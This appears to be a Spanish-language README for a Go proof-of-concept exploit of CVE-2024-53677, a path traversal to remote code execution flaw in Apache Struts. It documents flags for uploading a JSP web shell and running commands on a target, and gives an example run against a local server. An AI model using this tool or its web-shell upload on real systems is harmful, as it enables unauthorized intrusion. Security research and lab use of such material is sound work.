
a proof of concept of CVE-2024-53677
Una vieja vulnerabilidad que afecta a Apache Struts provocando LFI y ejecución remota.
Apache Struts path traversal → RCE (CVE-2024-53677)
He dedicado mucho tiempo a hacer esto lo más personalizable posible porque cuando me encontré por primera vez con este CVE no encontré una buena fuente que lo implementara correctamente. La mayoría de las banderas tienen valores por defecto, así que no te desanimes con todas estas banderas.
git clone https://github.com/Cythonic1/CVE-2024-53677-POC
cd CVE-2024-53677-POC
go run . -h
-command string
command to execute on the server default: whoami
-end-point string
post endpoint default to: upload.action
-file-location string
where to save the file into the server default: what test function return
-lfi-param string
Parameter name for LFI testing default: top.UploadFileName
-payload-file string
Path to the payload file default: ./shell.jsp
-payload-file-name string
name of the payload it self default: shell.jsp
-payload-param string
Parameter name for payload injection default: Upload
-test-file-name string
name of the testfile it self default: testfile.txt
-testing-file string
File used for testing default: ./testfile.txt
-url string
Target base URL (format http://strutted.htb/) do not forgot the [/] at the end
Todos estos comandos tienen valores por defecto. También implementé una función de prueba para verificar dónde se debería colocar el archivo, y también es una opción configurable por el usuario.
go run . -url http://127.0.0.1:8080/ -end-point upload.action
Algunas cosas a tener en cuenta.
Siéntete libre de modificar o añadir al exploit ♥️.